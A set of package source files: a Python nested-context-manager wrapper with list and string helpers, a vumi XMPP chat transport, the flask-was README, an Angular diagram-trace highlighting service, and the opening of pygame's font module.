    ``__enter__`` and ``__exit__`` method, which simply adds and subtracts from ``self.ctx_layer`` respectively::

        >>> class Example:
        ...     def __init__(self):
        ...         self.ctx_layer = 0
        ...     def __enter__(self):
        ...         self.ctx_layer += 1
        ...         return self
        ...     def __exit__(self, exc_type, exc_val, exc_tb):
        ...         if self.ctx_layer <= 0: raise ValueError('ctx_layer <= 0 !!!')
        ...         self.ctx_layer -= 1
        ...         return None

    If we then create an instance of ``Example``, and use it as a context manager in a 2 layer nested ``with exp``, we can see
    ``ctx_layer`` gets increased each time we use it as a context manager, and decreases after the context manager block::

        >>> exp = Example()
        >>> with exp as x:
        ...     print(x.ctx_layer)       # prints: 1
        ...     with exp as y:
        ...         print(y.ctx_layer)   # prints: 2
        ...     print(x.ctx_layer)       # prints: 1
        >>> exp.ctx_layer
        0

    Now, lets wrap it with :class:`.LayeredContext`, and set the maximum amount of layers to ``1``. If we start using ``ctx`` as a
    context manager, it works as if we used the example instance ``exp`` as a context manager. But, unlike the real instance, ``__enter__``
    is only really called for the first ``with`` block, and ``__exit__`` is only really called once we finish the first
    layer ``with ctx as x`` ::

        >>> ctx = LayeredContext(exp, max_layers=1)
        >>> with ctx as x:
        ...     print(x.ctx_layer)           # prints: 1
        ...     with ctx as y:
        ...         print(y.ctx_layer)       # prints: 1
        ...         print(ctx.virtual_layer) # prints: 2
        ...     print(x.ctx_layer)           # prints: 1
        ...     print(ctx.virtual_layer)     # prints: 1
        >>> exp.ctx_layer
        0
        >>> print(ctx.layer, ctx.virtual_layer)
        0 0
    """
    wrapped_class: K                           # the context manager instance / contextmanager result being wrapped
    layer_contexts: List[Any]                  # stack of context results from each REAL __enter__/__aenter__ call
    current_context: Optional[Union[K, Any]]   # most recent real context result (handed to excess layers)
    layer: int                                 # count of REAL enter calls currently active
    virtual_layer: int                         # count of `with` layers currently active (including consumed ones)
    max_layers: Optional[int]                  # max real layers; None means unlimited
    fail: bool                                 # raise instead of silently consuming excess layers

    def __init__(self, wrapped_class: K, max_layers: Optional[int] = 1, fail: bool = False):
        """
        Construct a :class:`.LayeredContext` instance, wrapping the context manager class instance or func:`contextlib.contextmanager`
        manager function ``wrapped_class``.

        :param K|object wrapped_class: A context manager class or :func:`contextlib.contextmanager` manager function to wrap
        :param int max_layers: Maximum layers of ``(async) with`` blocks before silently consuming further attempts to enter/exit
                               the context manager for :attr:`.wrapped_class`
        :param bool fail: (default: ``False``) When ``True``, will raise :class:`.NestedContextException` when an :meth:`.enter` call is
                          going to cause more than ``max_layers`` context manager layers to be active.
        """
        self.fail = fail
        self.max_layers = max_layers
        self.wrapped_class = wrapped_class
        self.layer_contexts = []
        self.current_context = None
        self.layer = 0
        self.virtual_layer = 0

    @property
    def class_name(self):
        """Best-effort human-readable name of :attr:`.wrapped_class` (function name or class name)."""
        if hasattr(self.wrapped_class, '__name__'):
            return self.wrapped_class.__name__
        return self.wrapped_class.__class__.__name__

    def enter(self) -> Union[K, Any]:
        """
        Synchronous enter: really calls ``wrapped_class.__enter__`` only while under :attr:`.max_layers`;
        otherwise returns :attr:`.current_context` (or raises when :attr:`.fail` is set).
        """
        self._virt_enter()
        if not self.max_layers or self.layer < self.max_layers:
            return self._enter(self.wrapped_class.__enter__())
        if self.fail:
            raise NestedContextException(f"Too many context manager layers for {self.class_name} ({self.__class__.__name__})")
        return self.current_context

    def exit(self, exc_type=None, exc_val=None, exc_tb=None) -> Any:
        """Synchronous exit: really calls ``wrapped_class.__exit__`` only when this layer did a real enter."""
        if self._virt_exit():
            return self._exit(self.wrapped_class.__exit__(exc_type, exc_val, exc_tb))
        return None

    async def aenter(self) -> Union[K, Any]:
        """Async counterpart of :meth:`.enter`, using ``__aenter__``."""
        self._virt_enter()
        if not self.max_layers or self.layer < self.max_layers:
            return self._enter(await self.wrapped_class.__aenter__())
        if self.fail:
            raise NestedContextException(f"Too many context manager layers for {self.class_name} ({self.__class__.__name__})")
        return self.current_context

    async def aexit(self, exc_type=None, exc_val=None, exc_tb=None) -> Any:
        """Async counterpart of :meth:`.exit`, using ``__aexit__``."""
        if self._virt_exit():
            return self._exit(await self.wrapped_class.__aexit__(exc_type, exc_val, exc_tb))
        return None

    def _enter(self, context: Optional[Union[K, Any]]):
        """Record a REAL enter: bump :attr:`.layer` and push ``context`` onto the stack."""
        self.layer += 1
        # NOTE(review): the debug messages in this class format max_layers with %d; if
        # max_layers is None (unlimited) this would raise TypeError when DEBUG logging
        # is enabled - confirm and consider %s.
        log.debug(
            "Entering context layer %d (virt: %d) of class %s (max: %d)", self.layer, self.virtual_layer, self.class_name, self.max_layers
        )
        self.current_context = context
        self.layer_contexts.append(self.current_context)
        return self.current_context

    def _exit(self, result):
        """Record a REAL exit: pop the layer's context and restore the previous one (or None)."""
        log.debug("Exiting context layer %d of class %s (max layers: %d)", self.layer, self.class_name, self.max_layers)
        self.layer -= 1
        self.layer_contexts.pop(self.layer)
        self.current_context = None if self.layer < 1 else self.layer_contexts[self.layer - 1]
        return result

    def _virt_enter(self):
        """Record a virtual (``with`` statement) enter - always increments, real or not."""
        self.virtual_layer += 1
        log.debug("ENTER virtual layer %d of class %s (max layers: %d)", self.virtual_layer, self.wrapped_class, self.max_layers)

    def _virt_exit(self):
        """
        Record a virtual exit. Returns ``True`` only when the caller should perform a REAL
        exit - i.e. when (after decrementing) the remaining virtual layers have dropped
        below the count of real layers.
        """
        if self.virtual_layer < 1:
            log.debug("Not calling real _exit as virtual_layer (%d) is 0 or less", self.virtual_layer)
            return False
        log.debug("EXIT virtual layer %d of class %s (max layers: %d)", self.virtual_layer, self.wrapped_class, self.max_layers)
        self.virtual_layer -= 1
        if self.virtual_layer >= self.layer:
            # A consumed (excess) layer is unwinding - the real context manager stays open.
            log.debug("Not calling real _exit as virtual_layer (%d) >= layer (%d)", self.virtual_layer, self.layer)
            return False
        return True

    def __enter__(self) -> Union[K, Any]:
        """Delegates to :meth:`.enter`."""
        return self.enter()

    def __exit__(self, exc_type, exc_val, exc_tb) -> Any:
        """Delegates to :meth:`.exit`."""
        return self.exit(exc_type, exc_val, exc_tb)

    async def __aenter__(self) -> Union[K, Any]:
        """Delegates to :meth:`.aenter`."""
        return await self.aenter()

    async def __aexit__(self, exc_type, exc_val, exc_tb) -> Any:
        """Delegates to :meth:`.aexit`."""
        return await self.aexit(exc_type, exc_val, exc_tb)
def strip_null(value: Union[str, bytes], conv: Callable[[str], Union[str, bytes, T]] = stringify, nullc="\00") -> Union[str, bytes, T]:
    """
    Convenience helper: :func:`.stringify` ``value``, then scrub surrounding whitespace and null
    characters from it. The whitespace/null stripping is performed twice, so characters that were
    hidden behind the other kind (e.g. spaces wrapped in null bytes) are removed as well.

    :param str|bytes value: The value to clean whitespace/null bytes out of
    :param callable conv: (Default :func:`.stringify`) Optionally, you can override the casting function used after
                          the stripping is completed
    :param str nullc: (Default: ``\\00``) Null characters to remove
    :return str|bytes|T cleaned: The cleaned up ``value``
    """
    cleaned = stringify(value)
    # Two full passes of whitespace-strip followed by null-strip, "for good measure".
    for _ in range(2):
        cleaned = cleaned.strip().strip(nullc)
    return conv(cleaned)
def auto_list(obj: V, conv: Union[Type[T], Callable[[V], T]] = list, force_wrap=False, force_iter=False, **kw) -> T:
    """
    Painlessly convert assorted data types into list-like objects (:class:`.list` / :class:`.tuple` / :class:`.set` etc.)

    Ensures ``obj`` is an instance of ``conv``; when it isn't, it's converted into one using one of
    two strategies, chosen based on the detected type of ``obj``:

    * **List wrapping** (``conv([obj])``) - ``obj`` becomes a single item inside a new list. Used by default
      for singular value types (``str``, ``bytes``, ``int``, ``float``, ``Decimal``, ``bool``, ``dict``), since
      iterating those would e.g. turn ``"hello"`` into ``['h', 'e', 'l', 'l', 'o']``, which is rarely the
      intent. Force this strategy with ``force_wrap=True``.
    * **List iteration** (``conv(list(obj))``) - the *contents* of ``obj`` are converted rather than ``obj``
      itself becoming a single item. Used by default for list-like types (``list``, ``set``, ``tuple``,
      ``range``) and any other object exposing ``__iter__``. Force this strategy with ``force_iter=True``.

    Examples::

        >>> auto_list('hello world')
        ['hello world']
        >>> auto_list('lorem ipsum', conv=set)
        {'lorem ipsum'}
        >>> auto_list('hello world', force_iter=True)
        ['h', 'e', 'l', 'l', 'o', ' ', 'w', 'o', 'r', 'l', 'd']
        >>> auto_list(('this', 'is', 'a', 'test',))
        ['this', 'is', 'a', 'test']
        >>> auto_list(('this', 'is', 'a', 'test',), force_wrap=True)
        [('this', 'is', 'a', 'test')]

    :param V|any obj: An object of practically any type, to convert into an instance type of ``conv``
    :param T|type|callable conv: A :class:`.type` which is also callable with ``obj`` as the first positional argument, to convert
                                 ``obj`` into a ``conv`` instance.
    :param bool force_wrap: When ``True``, always convert via the list wrapping method ``conv([obj])``,
                            regardless of the detected type.
    :param bool force_iter: When ``True``, always convert via the list iterator method ``conv(list(obj))``,
                            regardless of the detected type.
    :keyword bool zero: Passthru argument to :func:`.empty` (treat the number ``0`` as empty)
    :keyword bool itr: Passthru argument to :func:`.empty` (treat zero-length iterables as empty)
    :return T|list|set|tuple data: The object ``obj`` after converting it into a ``conv`` instance
    """
    obj = empty_if(obj, [], zero=kw.get('zero', True), itr=kw.get('itr', True))
    # Already the requested container type - nothing to do.
    if obj is not None and isinstance(obj, conv):
        return obj
    # Singular value types become a single item inside the new container, unless iteration is forced.
    singular_types = (str, bytes, int, float, Decimal, bool, dict)
    if not force_iter and (force_wrap or isinstance(obj, singular_types)):
        return conv([obj])
    # List-like / iterable objects have their contents converted into ``conv`` instead.
    if force_iter or isinstance(obj, (list, set, tuple, range)) or hasattr(obj, '__iter__'):
        return conv(list(obj))
    # Fallback: hand the object straight to the converter.
    return conv(obj)
|
PypiClean
|
/vumi-seidu626-0.6.17.tar.gz/vumi-seidu626-0.6.17/vumi/transports/xmpp/xmpp.py
|
from twisted.words.protocols.jabber.jid import JID
from twisted.words.xish import domish
from twisted.words.xish.domish import Element as DomishElement
from twisted.internet.task import LoopingCall
from twisted.internet.defer import inlineCallbacks
from wokkel.client import XMPPClient
from wokkel.ping import PingClientProtocol
from wokkel.xmppim import (RosterClientProtocol, MessageProtocol,
PresenceClientProtocol)
from vumi.transports.base import Transport
class TransportRosterClientProtocol(RosterClientProtocol):
    """Roster protocol that eagerly fetches the roster as soon as the connection initializes."""

    def connectionInitialized(self):
        # get the roster as soon as the connection's been initialized, this
        # allows us to see who's online but more importantly, allows us to see
        # who's added us to their roster. This allows us to auto subscribe to
        # anyone, automatically adding them to our roster, skips the "user ...
        # wants to add you to their roster, allow? yes/no" hoopla.
        self.getRoster()
class TransportPresenceClientProtocol(PresenceClientProtocol):
    """
    A custom presence protocol to automatically accept any subscription
    attempt.
    """

    def __init__(self, initialized_callback, *args, **kwargs):
        super(TransportPresenceClientProtocol, self).__init__(*args, **kwargs)
        # Invoked once the connection is initialized (the transport uses this to
        # begin its periodic presence announcements).
        self.initialized_callback = initialized_callback

    def connectionInitialized(self):
        super(TransportPresenceClientProtocol, self).connectionInitialized()
        self.initialized_callback()

    def subscribeReceived(self, entity):
        # Auto-accept: subscribe back to the requester and confirm their subscription.
        self.subscribe(entity)
        self.subscribed(entity)

    def unsubscribeReceived(self, entity):
        # Mirror unsubscription requests both ways as well.
        self.unsubscribe(entity)
        self.unsubscribed(entity)
class XMPPTransportProtocol(MessageProtocol, object):
    """Bridges inbound/outbound XMPP chat messages to the transport's callbacks."""

    def __init__(self, jid, message_callback, connection_callback,
                 connection_lost_callback=None,):
        """
        :param jid: the :class:`JID` this transport is connected as.
        :param message_callback: called with keyword args for each inbound chat message.
        :param connection_callback: called once the XML stream connection is made.
        :param connection_lost_callback: optional; called with the failure reason on disconnect.
        """
        # BUGFIX: this previously called ``super(MessageProtocol, self).__init__()``.
        # Passing the *parent* class as super()'s first argument starts the MRO lookup
        # after MessageProtocol, skipping MessageProtocol's own initializer. super()
        # must be given the class it is written in.
        super(XMPPTransportProtocol, self).__init__()
        self.jid = jid
        self.message_callback = message_callback
        self.connection_callback = connection_callback
        self.connection_lost_callback = connection_lost_callback

    def reply(self, jid, content):
        """Send a chat message with body ``content`` to ``jid`` over the active XML stream."""
        message = domish.Element((None, "message"))
        # intentionally leaving from blank, leaving for XMPP server
        # to figure out
        message['to'] = jid
        message['type'] = 'chat'
        message.addUniqueId()
        message.addElement((None, 'body'), content=content)
        self.xmlstream.send(message)

    def onMessage(self, message):
        """Messages sent to the bot will arrive here. Command handling routing
        is done in this function."""
        # Ignore stanzas without a proper <body> element (e.g. chat-state notifications).
        if not isinstance(message.body, DomishElement):
            return None
        text = unicode(message.body).encode('utf-8').strip()
        # Strip the XMPP resource suffix: "user@host/resource" -> "user@host".
        from_addr, _, _ = message['from'].partition('/')
        self.message_callback(
            to_addr=self.jid.userhost(),
            from_addr=from_addr,
            content=text,
            transport_type='xmpp',
            transport_metadata={
                'xmpp_id': message.getAttribute('id'),
            })

    def connectionMade(self):
        """Notify the transport that the stream is up, then run the default handling."""
        self.connection_callback()
        return super(XMPPTransportProtocol, self).connectionMade()

    def connectionLost(self, reason):
        """Notify the transport (when a callback was supplied) that the connection dropped."""
        if self.connection_lost_callback is not None:
            self.connection_lost_callback(reason)
        super(XMPPTransportProtocol, self).connectionLost(reason)
class XMPPTransport(Transport):
"""XMPP transport.
Configuration parameters:
:type host: str
:param host:
The host of the XMPP server to connect to.
:type port: int
:param port:
The port on the XMPP host to connect to.
:type debug: bool
:param debug:
Whether or not to show all the XMPP traffic. Defaults to False.
:type username: str
:param username:
The XMPP account username
:type password: str
:param password:
The XMPP account password
:type status: str
:param status:
The XMPP status 'away', 'xa', 'chat' or 'dnd'
:type status_message: str
:param status_message:
The natural language status message for this XMPP transport.
:type presence_interval: int
:param presence_interval:
How often (in seconds) to send a presence update to the roster.
:type ping_interval: int
:param ping_interval:
How often (in seconds) to send a keep-alive ping to the XMPP server
to keep the connection alive. Defaults to 60 seconds.
"""
start_message_consumer = False
_xmpp_protocol = XMPPTransportProtocol
_xmpp_client = XMPPClient
def __init__(self, options, config=None):
super(XMPPTransport, self).__init__(options, config=config)
self.ping_call = LoopingCall(self.send_ping)
self.presence_call = LoopingCall(self.send_presence)
def validate_config(self):
self.host = self.config['host']
self.port = int(self.config['port'])
self.debug = self.config.get('debug', False)
self.username = self.config['username']
self.password = self.config['password']
self.status = self.config['status']
self.status_message = self.config.get('status_message', '')
self.ping_interval = self.config.get('ping_interval', 60)
self.presence_interval = self.config.get('presence_interval', 60)
def setup_transport(self):
self.log.msg("Starting XMPPTransport: %s" % self.transport_name)
self.jid = JID(self.username)
self.xmpp_client = self._xmpp_client(
self.jid, self.password, self.host, self.port)
self.xmpp_client.logTraffic = self.debug
self.xmpp_client.setServiceParent(self)
self.presence = TransportPresenceClientProtocol(self.announce_presence)
self.presence.setHandlerParent(self.xmpp_client)
self.pinger = PingClientProtocol()
self.pinger.setHandlerParent(self.xmpp_client)
self.ping_call.start(self.ping_interval, now=False)
roster = TransportRosterClientProtocol()
roster.setHandlerParent(self.xmpp_client)
self.xmpp_protocol = self._xmpp_protocol(
self.jid, self.publish_message, self.unpause_connectors,
connection_lost_callback=self.connection_lost)
self.xmpp_protocol.setHandlerParent(self.xmpp_client)
self.log.msg("XMPPTransport %s started." % self.transport_name)
def connection_lost(self, reason):
self.log.msg("XMPP Connection lost. %s" % reason)
def announce_presence(self):
if not self.presence_call.running:
self.presence_call.start(self.presence_interval)
@inlineCallbacks
def send_ping(self):
if self.xmpp_client.xmlstream:
yield self.pinger.ping(self.jid)
def send_presence(self):
    """Broadcast our availability; driven by ``self.presence_call``."""
    if not self.xmpp_client.xmlstream:
        return
    self.presence.available(statuses={None: self.status})
def teardown_transport(self):
    """Stop the periodic ping/presence loops on shutdown.

    The getattr guards cover the case where setup never completed and
    the loops were never created or started.
    """
    self.log.msg("XMPPTransport %s stopped." % self.transport_name)
    for attr in ('ping_call', 'presence_call'):
        call = getattr(self, attr, None)
        if call and call.running:
            call.stop()
def handle_outbound_message(self, message):
    """Deliver an outbound vumi message over XMPP and publish an ack.

    Returns False (after logging) when the XMPP stream is not up yet.
    """
    recipient = message['to_addr']
    text = message['content']
    destination = JID(recipient).userhost()
    if not self.xmpp_protocol.xmlstream:
        self.log.err("Outbound undeliverable, XMPP not initialized yet.")
        return False
    self.xmpp_protocol.reply(destination, text)
    message_id = message['message_id']
    return self.publish_ack(
        user_message_id=message_id,
        sent_message_id=message_id)
|
PypiClean
|
/flask_was-0.1.0.tar.gz/flask_was-0.1.0/README.md
|

🍾 **Flask extension for JSON API**
> This project is created and maintained by ISCLUB studio. It is released under the MIT license on GitHub and PyPI.
## Introduction
**Flask-was** helps you separate the front end from the back end. It quickly validates and checks request data before the view function runs, then generates and returns the response. You can also plug in custom user-verification functions for data validation. Fast and elegant.
## Install
Use pip to install or update:
``` bash
$ pip install -U flask-was
```
## Example
**A simple Signin**
``` python
from flask import Flask
from flask_was import Was, Checker, Column
app = Flask(__name__)
api = Was(app)
api.addChecker(
namespace="signin",
obj=Checker(
{
"name": Column(api.String, biggest_str=20, smallest_str=4),
"email": Column(api.EmailAddress, biggest_str=255, smallest_str=3),
"password": Column(api.String, biggest_str=20, smallest_str=4),
}
),
)
@app.route("/api/signin", methods=["POST"])
@api.checkeout("signin")
def api_signin(postdata):
if postdata[0]:
print("======== A new user coming ... ========")
print("Name: " + postdata[1]["name"])
print("Email: " + postdata[1]["email"])
return api.send(json={"messagess": "Signin was OK"}, status=200)
else:
return api.send(
json={"messagess": "Have some error. Check you forms", "postdata": postdata},
status=400,
)
app.run()
```
**Post Request**:
``` python
import requests
print(requests.post(
"http://127.0.0.1:5000/api/signin",
data={
"name":"Flask",
"email":"[email protected]",
"password":"12345"
},
).text)
```
## Documentation
Read the **documentation** to get started. The documentation is in the `/docs` folder. If this project is helpful to you, please give it a **Star**.
## Contribution Guide
If you find errors or have good suggestions, please refer to the following template to create **issues** and **pull requests**
- `Good ideas`
``` markdown
## Introduction
What can this idea do ...
## Code
The files I changed and what did I do ...
## Info
Version Information...
Python: 3.6.x
Flask: 1.1.x
Flask-Was: 0.1.x
```
- `Problems in use`
``` markdown
## Business
My business needs ...
## Code
Part of the code and full traceback ...
What does my code do ...
## Info
Version Information...
Python: 3.6.x
Flask: 1.1.x
Flask-Was: 0.1.x
```
If you make a useful contribution, you will be added to the **contributors.md**
## License
**MIT LICENSE**
|
PypiClean
|
/peek-plugin-diagram-trace-3.4.11.tar.gz/peek-plugin-diagram-trace-3.4.11/peek_plugin_diagram_trace/plugin-module/_private/services/PrivateDiagramTraceService.ts
|
import { filter, first, takeUntil } from "rxjs/operators";
import { Injectable } from "@angular/core";
import {
DiagramBranchService,
DiagramCoordSetService,
DiagramLookupService,
DiagramOverrideService,
diagramPluginName,
DiagramToolbarService,
ToolbarTypeE,
} from "@peek/peek_plugin_diagram";
import {
DocDbPopupActionI,
DocDbPopupContextI,
DocDbPopupService,
DocDbPopupTypeE,
} from "@peek/peek_core_docdb";
import { DiagramOverrideColor } from "@peek/peek_plugin_diagram/override";
import { ShapeColorTuple } from "@peek/peek_plugin_diagram/lookup_tuples";
import { NgLifeCycleEvents, TupleSelector } from "@synerty/vortexjs";
import { BalloonMsgService } from "@synerty/peek-plugin-base-js";
import {
GraphDbService,
GraphDbTraceResultTuple,
TraceConfigListItemI,
} from "@peek/peek_plugin_graphdb";
import { diagramTraceTuplePrefix } from "../PluginNames";
import { PrivateDiagramTraceTupleService } from "./PrivateDiagramTraceTupleService";
import {
MaxTraceVertexesPropertyName,
SettingPropertyTuple,
TraceColorsPropertyName,
} from "../tuples/SettingPropertyTuple";
import {
DiagramTraceI,
DiagramTraceService,
} from "@peek/peek_plugin_diagram_trace/DiagramTraceService";
/** Private Diagram Trace Service
 *
 * Adds "start trace" actions to the diagram item popups, runs the trace via
 * the GraphDB service and renders the result as colour overrides on the
 * diagram, with a toolbar button to clear them again.
 *
 * This is a helper service to simplify integrations with the diagram.
 */
@Injectable()
export class PrivateDiagramTraceService
    extends NgLifeCycleEvents
    implements DiagramTraceService
{
    // Trace configs are fetched lazily and cached per model set key.
    private traceConfigsByModelSetKey: {
        [modelSetKey: string]: TraceConfigListItemI[];
    } = {};
    // One colour override per active trace, in application order.
    private appliedOverrides: DiagramOverrideColor[] = [];
    private _activeTraces: DiagramTraceI[] = [];
    private readonly clearTracesButtonKey: string;
    // `colorsByModelSet` is rotated as traces are created and reset from
    // `originalColorsByModelSet` when all traces are cleared.
    private originalColorsByModelSet: { [key: string]: ShapeColorTuple[] } = {};
    private colorsByModelSet: { [key: string]: ShapeColorTuple[] } = {};
    private maxVertexes: number | null = null;

    constructor(
        private diagramCoordSetService: DiagramCoordSetService,
        private tupleService: PrivateDiagramTraceTupleService,
        private balloonMsg: BalloonMsgService,
        private diagramBranchService: DiagramBranchService,
        private objectPopupService: DocDbPopupService,
        private diagramToolbar: DiagramToolbarService,
        private diagramOverrideService: DiagramOverrideService,
        private graphDbService: GraphDbService,
        private diagramLookupService: DiagramLookupService
    ) {
        super();
        this.clearTracesButtonKey =
            diagramTraceTuplePrefix + "diagramTraceTuplePrefix";
        // Defer setup until the diagram lookup data has loaded.
        if (this.diagramLookupService.isReady()) {
            this.setup();
        } else {
            this.diagramLookupService
                .isReadyObservable()
                .pipe(filter((ready) => ready))
                .pipe(first())
                .pipe(takeUntil(this.onDestroyEvent))
                .subscribe(() => this.setup());
        }
    }

    get activeTraces(): DiagramTraceI[] {
        return this._activeTraces;
    }

    /** Wire up popup hooks, edit-mode handling and settings subscriptions. */
    private setup(): void {
        this.objectPopupService
            .popupObservable(DocDbPopupTypeE.summaryPopup)
            .pipe(
                filter(
                    (c: DocDbPopupContextI) =>
                        c.triggeredByPlugin == diagramPluginName
                )
            )
            .pipe(takeUntil(this.onDestroyEvent))
            .subscribe((c: DocDbPopupContextI) => this.handlePopup(c));

        this.objectPopupService
            .popupObservable(DocDbPopupTypeE.detailPopup)
            .pipe(
                filter(
                    (c: DocDbPopupContextI) =>
                        c.triggeredByPlugin == diagramPluginName
                )
            )
            .pipe(takeUntil(this.onDestroyEvent))
            .subscribe((c: DocDbPopupContextI) => this.handlePopup(c));

        // Remove all traces if the diagram goes into edit mode
        this.diagramBranchService
            .startEditingObservable()
            .pipe(takeUntil(this.onDestroyEvent))
            .subscribe(() => this.clearAllTraces());

        // Watch the admin settings for trace colours / max vertexes.
        const settingsPropTs = new TupleSelector(
            SettingPropertyTuple.tupleName,
            {}
        );
        this.tupleService.tupleDataOfflineObserver
            .subscribeToTupleSelector(settingsPropTs)
            .pipe(takeUntil(this.onDestroyEvent))
            .subscribe((tuples: SettingPropertyTuple[]) => {
                for (const prop of tuples) {
                    switch (prop.key) {
                        case TraceColorsPropertyName: {
                            this.loadColors(prop.char_value);
                            break;
                        }
                        case MaxTraceVertexesPropertyName: {
                            this.maxVertexes = prop.int_value;
                            break;
                        }
                        default: {
                            // pass
                        }
                    }
                }
            });
    }

    /** Resolve the admin-configured colour names against each model set's
     * colour lookups, preserving the configured order. */
    private loadColors(colorString: string) {
        this.colorsByModelSet = {};
        this.originalColorsByModelSet = {};
        for (const modelSetKey of this.diagramCoordSetService.modelSetKeys()) {
            const colors =
                this.diagramLookupService.colorsOrderedByName(modelSetKey);
            const newColors = (this.colorsByModelSet[modelSetKey] = []);
            // This is highly inefficient ...
            for (let colorStr of colorString.split(",")) {
                colorStr = colorStr.toLowerCase().trim();
                for (const c of colors) {
                    if (c.name.toLowerCase().trim() == colorStr) {
                        newColors.push(c);
                        break;
                    }
                }
            }
            this.originalColorsByModelSet[modelSetKey] = newColors.slice();
        }
    }

    /** Return (and cache) the trace configs for a model set. */
    private menusForModelSet(
        modelSetKey: string
    ): Promise<TraceConfigListItemI[]> {
        if (this.traceConfigsByModelSetKey[modelSetKey] != null)
            return Promise.resolve(this.traceConfigsByModelSetKey[modelSetKey]);

        return new Promise<TraceConfigListItemI[]>((resolve, reject) => {
            this.graphDbService
                .traceConfigListItemsObservable(modelSetKey)
                .pipe(takeUntil(this.onDestroyEvent))
                .subscribe((tuples: TraceConfigListItemI[]) => {
                    this.traceConfigsByModelSetKey[modelSetKey] = tuples;
                    resolve(tuples);
                });
        });
    }

    /** Add a "start trace" submenu to a diagram item popup, when the item
     * exists in the graph and trace configs are available. */
    private async handlePopup(context: DocDbPopupContextI): Promise<void> {
        if (context.key == null) return;

        if (
            this.originalColorsByModelSet[context.modelSetKey] == null ||
            this.originalColorsByModelSet[context.modelSetKey].length == 0
        ) {
            console.log(
                "ERROR: No matching trace colors, please configure in Peek Admin"
            );
            return;
        }

        const exists = await this.graphDbService.doesKeyExist(
            context.modelSetKey,
            context.key
        );
        if (!exists) return;

        let traceConfigs: TraceConfigListItemI[] = [];
        try {
            traceConfigs = await this.menusForModelSet(context.modelSetKey);
        } catch (e) {
            this.balloonMsg.showError(`ERROR: Diagram Trace ${e}`);
            return;
        }
        if (traceConfigs == null || traceConfigs.length == 0) return;

        const rootMenu: DocDbPopupActionI = {
            name: null,
            tooltip: "Start a trace from this equipment",
            icon: "highlight",
            callback: null,
            children: [],
            closeOnCallback: false,
        };
        for (const item of traceConfigs) {
            rootMenu.children.push({
                name: item.title,
                tooltip: `Trace type = ${item.name}`,
                icon: null,
                callback: () => this.menuClicked(item.key, context),
                children: [],
                closeOnCallback: true,
            });
        }
        context.addAction(rootMenu);
    }

    /** Run the trace and apply a colour override for its edges + vertexes. */
    private async menuClicked(
        traceKey: string,
        context: DocDbPopupContextI
    ): Promise<void> {
        // const coordSetKey = context.options.triggeredForContext;
        let traceResult: GraphDbTraceResultTuple = null;
        try {
            traceResult = await this.graphDbService.getTraceResult(
                context.modelSetKey,
                traceKey,
                context.key,
                this.maxVertexes
            );
        } catch (e) {
            this.balloonMsg.showError(`ERROR: Diagram Trace ${e}`);
            return;
        }
        if (traceResult.traceAbortedMessage != null) {
            this.balloonMsg.showError(traceResult.traceAbortedMessage);
            return;
        }

        // Get the color and rotate the queue
        const colors = this.colorsByModelSet[context.modelSetKey];
        const color = colors.shift();
        colors.push(color);

        const override = new DiagramOverrideColor(context.modelSetKey, null);
        override.setLineColor(color);
        override.setColor(color);
        for (const edge of traceResult.edges) {
            override.addDispKeys([edge.key]);
        }
        // BUGFIX: this loop previously iterated `traceResult.edges` a second
        // time, so the traced vertexes were never highlighted.
        for (const vertex of traceResult.vertexes) {
            override.addDispKeys([vertex.key]);
        }
        this.diagramOverrideService.applyOverride(override);
        this.appliedOverrides.push(override);
        this._activeTraces.push({
            modelSetKey: context.modelSetKey,
            startKey: context.key,
            traceKey: traceKey,
            traceModel: traceResult,
        });
        this.addClearTracesButton(context.modelSetKey);
    }

    /** Show the "Clear Traces" toolbar button when the first trace appears. */
    private addClearTracesButton(modelSetKey: string) {
        if (this.appliedOverrides.length != 1) return;
        this.diagramToolbar.addToolButton(
            modelSetKey,
            null,
            {
                key: this.clearTracesButtonKey,
                name: "Clear Traces",
                tooltip: "Clear Traces",
                icon: "clear",
                callback: () => this.clearAllTraces(),
                children: [],
            },
            ToolbarTypeE.ViewToolbar
        );
    }

    /** Remove the toolbar button once the last trace is cleared. */
    private removeClearTracesButton() {
        if (this.appliedOverrides.length != 0) return;
        this.diagramToolbar.removeToolButton(this.clearTracesButtonKey);
    }

    /** Remove every applied override and reset the colour rotation. */
    private clearAllTraces(): void {
        for (const modelSetKey of Object.keys(this.originalColorsByModelSet)) {
            this.colorsByModelSet[modelSetKey] =
                this.originalColorsByModelSet[modelSetKey].slice();
        }
        while (this.appliedOverrides.length != 0) {
            const override = this.appliedOverrides.pop();
            this.diagramOverrideService.removeOverride(override);
        }
        this._activeTraces = [];
        this.removeClearTracesButton();
    }
}
|
PypiClean
|
/pygame_cffi-0.2.1-cp27-cp27m-win_amd64.whl/pygame/font.py
|
import os
import sys
from pygame._sdl import sdl, ffi
from pygame._error import SDLError
from pygame.base import register_quit
from pygame.color import Color
from pygame.compat import bytes_, ord_, unicode_
from pygame.pkgdata import getResource
from pygame.rwobject import (rwops_from_file, rwops_encode_file_path,
rwops_from_file_path)
from pygame.surface import Surface
from pygame.sysfont import get_fonts, match_font, SysFont
# SDL doesn't stop multiple calls to TTF_Init, so we need to track
# our own status to ensure we don't accidently call TTF_Quit on a
# TTF_Init called outside our control.
_font_initialised = 0
_font_defaultname = "freesansbold.ttf"
if sys.maxunicode == 1114111:
    # Wide Unicode build: supplementary-plane characters exist, so check
    # whether the code point fits in UCS-2 (i.e. is in the BMP).
    def is_ucs_2(ch):
        return ord(ch) <= 0xFFFF
else:
    # Narrow build: every representable character already fits in UCS-2.
    def is_ucs_2(ch):
        return True
def utf_8_needs_UCS_4(text):
    """Return True when UTF-8 *text* contains a code point above U+FFFF.

    0xF0 is the lead byte of every 4-byte UTF-8 sequence, which is exactly
    the encoding of code points outside the BMP.
    """
    threshold = ord(b'\xF0')
    return any(ord_(ch) >= threshold for ch in text)
def autoinit():
    """Initialise SDL_ttf (idempotently); return True on success.

    Registers ``autoquit`` with pygame's quit machinery on first use so
    that TTF_Quit is only ever called for our own TTF_Init (see the module
    comment above about tracking our own init status).
    """
    global _font_initialised
    if not _font_initialised:
        register_quit(autoquit)
        # TTF_Init returns non-zero on failure.
        if sdl.TTF_Init():
            return False
        _font_initialised = 1
    return bool(_font_initialised)
def autoquit():
    """Shut SDL_ttf down, but only if we were the ones who initialised it."""
    global _font_initialised
    if not _font_initialised:
        return
    _font_initialised = 0
    sdl.TTF_Quit()
def init():
    """pygame.font.init(): return None

    Initialize the font module, raising SDLError on failure.
    """
    if autoinit():
        return
    raise SDLError.from_sdl_error()
def get_init():
    """pygame.font.get_init(): return bool

    True if the font module is initialized.
    """
    return _font_initialised != 0
def quit():
    """pygame.font.quit(): return None

